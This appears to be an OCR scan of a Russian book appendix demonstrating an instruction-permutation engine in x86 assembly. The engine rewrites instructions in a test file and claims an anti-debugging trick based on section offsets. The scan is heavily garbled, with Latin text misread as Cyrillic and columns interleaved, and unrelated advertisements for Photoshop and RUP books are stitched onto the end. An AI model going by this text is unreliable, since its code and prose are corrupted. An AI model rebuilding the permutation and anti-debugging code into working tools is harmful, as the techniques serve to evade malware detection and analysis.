Баз!-2.05а# саф 0х4553 _Регмитавог | мс -с 
1040 


Базв-2.05а# 


№оЕ Баа уеаН ? 





*/ 


„1пс1а4ае "деЁ1 пез. 1пс" 


„сехс 
„91061 _збаге 
_зсаке: | 

разн} %ерр 


поу] Зе5р, %еЪр 

МОУ1 $5,%еах 

оу] $Е1]е, %ех 

моу] $2, %есх 

106 $128 

МОУ] Зеах, РТЬЕ _Чезс (Феьр)} 


Это не универсальный механизм, а всего лишь демонстрация; поддерживает перму- поУ1 $19 зеах 
: 


тацию нескольких инструкций: хог, $16, {е5%, ог, поу. 


ПоУГ РТЬЕ_Чезс (%еьр) ‚Зеьх 


Основным недостатком является отсутствие дизассемблера длин, поэтому механизм моУ1 $0, %есх 


не поддерживает более сложных инструкций. 


Ограничения по коду 


м хопи огМе$ работают с маской регистр, регистр; тоу — регистр \ регистр, перемен- 


ная \ регистр; 


Ш максимальная длина — 5 байт: 1 байт на инструкцию и четыре на операнды; 


Ш нет поддержки памяти (тет). 


поу1 $2, %е4х 
116 5128 
моу] Зеах, ЕТЬЕ _1еп (%еЪр) 


№оУ1 $0, ($езр) 

поу1 РТЬЕ _1еп (ФеЪр) , Зеах 
МОУ1 Зеах, 4 (%езр) 

МОУ1 $3,8 [3езр} 

моУ1 $2,12(%езр} 


Есть специальная функция для добавления свободного байта из текущей позиции моу1 РТЬЕ_Чезс (ЗеЪр}, %еах 


(тоу — пермутация ее использует). 
Дата теряется после изменения размера. 


Реализована антиотладочная функция: ни один отладчик не может правильно прочи- 


МОУ Зеах, 16 (Зезр) 
поУ1 $0,20 (%езр} 
поу] $90, %еах 
МОУ] %езр, %ерх 


тать файл из-за смещения секций. Е $128 
: ения 
Что происходит: программа читает содержимое фала {е5ё и выдает все измен поу1 Феах, МЕМОВУ Чата (зер) 
в файл 1е51.041. - 
Тестовая программа обязана быть написана ассемблере и откомпилирована либо моу] $соипЕ, СОИМТЕВ а (%ер} 


пазт, либо газ (а5/19), но ни в коем случае не 2сс. В противном случае из-за пермутации 


инструкций тоу она работать не будет. 


па1п 1оор: 
поУ1 СООМТЕК_а (%еЪр} , Зеах 
сшр1 РТЬЕ 1 еп (%еЪр)}, %еах 
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инь. | Приложение 5. Демонстрация механизма пермутации 
, поу1 $55, Зесх 
31  сопетрче поу1 $8, $е4ах 
пр ех1е 416 $128 
соп1п1е: са11 шоуе Часа 
са11 снеск_русе Ш 
пехе: 


}пс1 СООМТЕВ_а (%еЪр) 


. смрь $1, РЬАС _ВУТЕ_Е1 гз% (%еБр} 
3 пр ма1п_1оор 


)е м3 


|: госасе: 
|| поу1 $9, СООМТЕВ_Ь (ЗеЪр) 
в писасе_1оор: 


сирЬ $1, РЬАС ВУТЕ_зесопа ($еьр} 
)е м3 _з4Ь 
































| 4ес1 СООМТЕВ_Ь (%еЪр) по СОС ОР 501 
| точь СООМТЕК Ъ (%еБр) ,%с1 пр п 
|, сезеёЬ %$с1,%С1 дз: 
| 32  тебити моУЬ СНАМСЕ_ВУТЕ_Е 15% (%еЪр),%с1 
р ` МОУ %с1, (%еах) 
й по\1 ВУТЕ _зкер(%еБр),%есх 11 ; 
| 1 тзе (Зе6р) са11 меш _гез12е 
|! спрь $1, ЕЪАб_ ВУТЕ_ ЕЕ у р са1]1 моуе_Чафа 
‚Й де п: а491 ТУЗТКОСТ 1еп(ЗеБр),Зеах 
|] поу] СНАМСЕ_ВУТЕ _зесопа (%еЪр) ,%еЪх 
В есопа (%еЪр} 
|| спрь УТ ЕТА_ВУТЕ мочь 361, (%вах) 
|| ]е м1 _зи пр 4 
Н 3_заь: 
| 4 (зеБр) м? 
| а991 ес 99СОт (зеор ПоУЬ СНАМСЕ_ВУТЕ Е1тз% (%е6р),%с] 
Й, ат р а моУЬ $с1, (Зеах) 
1пс е 11 моуе_Чафа 
Бр}, %с1 са - 
поуь ВУТЕ_39с0т9 1% 2}, 101 %$еах 
Пр п поу1 СНАМСЕ ВУТЕ _зесопЯ (%еЪр), %еБх 
п1: 
а441 Фесх, ВУТЕ_ЁЕ1г3% (%еЪр) вер) 4. моуЬ ЗЬ1, (Зеах) 
ааа! %есх, СНАМСЕ _ВУТЕ_зесоп евр °, о 
й  ПОЧЁ ВУТЕ ЗЕ (ЗеБр)„%с1 1пс1 СООМТЕВ_а (%еЪр) 
:| / _ хеситп: 
БР м2 са11 с1еахг_Ё1а9$ 
№1345: хес 
са11 моуе_Чаха а (веБр) 
е 
а991 веск, ВУТЕ_зесопа (еор снеск_Ъухе: 
} 
161 СНАКСЕ ВУТЕ_ Е рез (ЗеЪр) и. са11 моуе_Чаба 
Ь $с1 . 
поуь ВУТЕ_ зесоп4 (+еЪр), моУр $0х68, СНАМСЕ _ВУТЕ_Е 13% ($еЪр)} 
м2: . ПоУЬ $0х57, СНАМСЕ ВУТЕ_зесопа (%еБр) 
| спрь $1, ( ри моуь $0хВ7, ВУТЕ _Е1 3% (еЪр) 
| пе писабе_1оор моур $1, ВУТЕ _з5ер (%еЬр) 
И 1 54 Зеах ЩоУБ $1, РЦАСб_ВУТЕ_Ё1гз% (%еЬр) 
|] оу , 


поур $1, ВУТЕ ад4(%еь 
й №091 $1, %Зеьх $1, _а89 (%еЪр) 




















532 
ПоУЬ $5,ТМ5ТВОСТ 1еп (%еБр) 
са11 мабасе 
01; 
сирЬ $0х89, (%еах) 
пе п2 
поур $0х58, СНАМСЕ _ВУТЕ_зесопа (%еЪр} 
моУь $0х8В8, ВУТЕ _зесопа (ЗеЪр)} 
ВоУЬ 50х88, ВУТЕ зесопа раскир (Феьр) 
п1 з4Ь: 
` смрь $0х60,СНАМСЕ ВУТЕ_зесоп4 (%еЪр) 
)е п_1азе 
щоуЬ $8, ВУТЕ _з%ер (%еЬр) 
поуЬ $Ох4АР,СНАМСЕ _ВУТЕ_Е 1:56 (зеЪр)} 
ПоУЬ $1,ЕГАС _ВУТЕ_зесопа (%еЪр) 
са11 михасе 
1псЬ ВУТЕ_зесопа_Ъаскур (ФеБр) 
поуь ВУТЕ_зесопа_БаскКур (%ебр),%Ь1 
поУБ %Ъ1,ВУТЕ_зесопа {$еЪр} 
1псЬ СНАМСЕ_ВУТЕ_зесопЯ (ЗеЪр) 
пр 11 46 
па: 
спрЬ $0х85, (%еах) 
)пе п3 
поур $0х09,СНАМСЕ _ВУТЕ_Е1гз® (%еЪр)} 
поуь $0хВ7, ВУТЕ _зесопа (%$еБр) 
моуЬ $9, ВУТЕ_з(ер (ЗеЬр} 
са11 мибате 
п3: 
сшрь $0х09, (%еах) 
3 пе 14 
поур $0х85,СНАМСЕ _ВУТЕ_Ё1гз% (%еЬр} 
моур $0хВ7, ВУТЕ _зесопа (%еБр) 
ПоУБ $9, ВУТЕ _зкер (%еЬр} 
са11 мибафе 
п4: 
сир $0х29, (%еах) 
)дпе п5 
поуЬ $0х31, СНАМСЕ _ВУТЕ _Ё1:5% (%еЪр} 
моУЬ $0х8В7, ВУТЕ _зесопа { ЗеЪр)} 
поУЬ $9, ВУТЕ_з%ер (ЗеЪр) 
са11 мибасе 
п5: 
сирь $0х31, (%еах) 


пе 
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п_1а5% 
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МоуЬ $0х29, СНАМСЕ _ВУТЕ_Ё1г8% (%еЬр) 
поУЬ $0хВ7, ВУТЕ _зесопа (3еьр} 

ПОУЬ $9, ВУТЕ _з бер ($еЪр) 

са11 шитахе 


1азё: 
гее 





цоуе_ Чата: 
моу1 МЕМОВУ Чака (3еЪр),%еах 
оу] СООМТЕВ _а (ЗеЪр) ‚ %е4х 
а991 Зе4х, %еах 
хес 
ех1{ : 
ПОУ1 $5, %еах 
№оУ1 $Ё11е1,Зерх 
моУ1 $65, %есх 
116 $128 


ЩоУ1 %еах, ЕТЬЕ _Чезс_1(%еЬр) 
поУ1 $4, %еах 

МОУ] РТЬЕ _Че5с_1 (%еЪр} , %еЪх 
МОУ] МЕМОВУ Чака (%еБр), Зесх 
ОУ] ЕТЬЕ _1еп (%еЪр),%еах 
116 $128 


оу] $1, %еах 
116 $128 

меп_гез17е: 
ОУ1 $5163, %еах 
поу1 МЕМОВУ Чака (%ерр} , Зеьх 
ПоУ1 ЕТЬЕ 1 еп (%еЪр)},%есх 
поу1 ВУТЕ_а94(%еБр), %ез1 
2941 Зе51,РТЬЕ 1еп (%еЪр} 
Поу1 ЕТЬЕ_1еп (%Зебр),%е4х 
Моу1 $1, $е51 
116 $128 
оу] Феах, МЕМОВУ _дака (зе5р) 


поУ1 РТЬЕ 1ел (%$еБр) , %$еах 
МОУ Зеах, СООМТЕВ _с (Зеьр) 
поу1 СООМТЕВ_а (%еЪр) , Зеах 
2991 ТМЗТВОСТ_1еп (ЗеБр) , %еах 
ес] %еах 


МОУ] Зеах, МЕМОВУ оЕЕзек (ФеЪр) 
ЩЕ $ _}оор: . 
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„пиво о сарае овичон лизовоевение 

. оабааеерааз оне 

а ТОН помечена нов иесеченанаь СО ТЕРРОР РИА 
«., 
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поу{ МЕМОВУ ОЕЕзее (ФеЪр) , %еах 
смр1 СООМТЕВ_с(%еЬр), %еах 
)е мгзе 


ПОУ1 МЕМОВУ _Чата (%еЪр)},%есх 
поу1 СООМТЕВ_с (%еЪр} ,%е4х 
зи] ВУТЕ_а@а (%еБр),%еах 
а49] зеах, %есх 

поУЬ (%есх), 551 


поу1 МЕМОВУ Чака (%еЬр),%еах 
поу1 СООМТЕК_с (%ебр) , Зе9х 
а494] Зедх, %еах 

поур $61, ($еах) 


ес1 СООМТЕВ _с (%еЪр) 
3пр пгз_1оор 


Щг5е;: 


поу1 СООМТЕВ_а (%ФеЪр)} , %еах 
а991 ТМ5ТВОСТ_1еп (%еБр)} , Зеах 
поу1 %еах, СООМТЕВ _с (%еБр) 
а441 ВУТЕ_а49(%еьр),%еах 
поу1 %еах,МЕМОВУ оЕЁзек (ЗеЪр} 


пор_1: 


поу1 МЕМОВУ оЕЕзек (%еЪр),%есх 
сир1 СООМТЕВ_с (%еБр) ,%есх 
)е Веге 


поу1 МЕМОВУ Чака (%еЪр) ,Зеах 
оу СООМТЕВ_с (%еЪр) ,%едх 
а441 %еах, %$еах 

поур $0х90, (%$еах) 


1пс1 СООМТЕВ_с (%еЪр) 
Зпр пор_1 


веге: 


гее 


с] еак_Ё1адз: 


поуЬ $0,РЬАб _ВУТЕ_Ё1х5% (%еЬр) 
поуь $0,РЬАС ВУТЕ_зесопа (%еЪр} 
ге 


РТШЕ_1еп = -16 
ВУТЕ_Е1тзЕ = -20 
ВУТЕ_ааа = -24 
ВУТЕ_зесоп4 = -28 
ВУТЕ_зесопа Баскир = -32 
ВУТЕ_з%ер = -36 
РЬАСб_ВУТЕ_Ё1г$6 = -40 
РАС _ ВУТЕ _ _зесопа = -44 
СНАМбЕ _ВУТЕ Е1гзо = -48 
СНАМСЕ ВУТЕ зесопа = -52 
МЕМОВУ Чака = -56 
МЕМОВУ _оЕЕзе& = -60 
ТИЗТВОСТ 1еп = -64 
СООМТЕВ_а = -68 
СООМТЕВ_Ь = -72 
СООМТЕВ _с = -76 
$27: „3зсг1п9 "Срапдеа\п" 

Ё11е: ЗеЕ1Па "безь" 

Ё11е1;: „зех1п9 "еезё.оце" 


/*Тестовая программа» / 


.91051 _зхах& 


_з$агё: 


хог ] $еах, %еах 
{езЕ1  зерх, з%еЬх 
$41 $есх, Зесх 
0х1 Фе4ах, Зе х 


поу1 $1, %еах 
114 $128 


/ *а4еЕ1 пез. 1пс* / 
соцпф = 0 


























РТЬЕ_Чезс = -4 
ЕТЬЕ_Чдезс_1 = -8 
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Эта книга представляет собой самоучитель по растровой 
программной среды обработки изображений выбран самый по 
редактор РВою5вор последней версии С$. В книге рассм 
технической ретуши, цветокоррекии и компьютерного монт 
материал расположен по возрастанию сложности. Самые трудо 
технологии обработки помечены звездочкой. Весь необхо; 
материал и сведения технического характера приводятся по ходу и 

Самоучитель предназначен для лиц, самостоятельно изучающих 
пользователей программы РВоюзВор с начальной и средней подготовко; 
Книга содержит СО-ВОМ с примерами. 
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Кролл П., Крачтен Ф. 
КаНопа! Итйе4 Ргосез$ - это легКо. РукоВодстВо по | 


Часто приходится слышать, что КОР — это одна из наиболее т 
зованных методологий разработки программного обеспечения, тре 
жества «бесполезных» документов и моделей. Между тем, ВОР 1 
применять даже в проекте, выполняемом безо всяких формально: 
стом за одну неделю. По крайней мере, так считают авторы этой | 
липп Крачтен. А к их мнению стоит прислушаться, ведь они — пра 
вавшие во внедрении КТР во множестве организаций. 

Эта книга не заменит последовательного изложения КУР, зато 
во конкретных советов и рекомендаций. В книге приведено сравне 
тодологиями, включая так называемые гибкие (азПе) методы (ХР и 
саны фазы разработки. Но наибольший интерес, видимо, вызовут 
настройке КОР на требования конкретного проекта или организа 
исполняемых участниками разработки. Как выбрать из КОР именн 
рить выполнение проекта, снизить трудоемкость и при этом обесп 
кое качество разработки? Как определить необходимое количествс 
зовать работу большой и распределенной команды? Как вообще | 
КОР в большой организации? На какие моменты стоит обратить. 
КУР специалистам разных специальностей? Ответы на все эти и 
содержатся в книге. 

Книга представляет интерес для всех, кто уже использует ВОР 
зовать его в будущем. 
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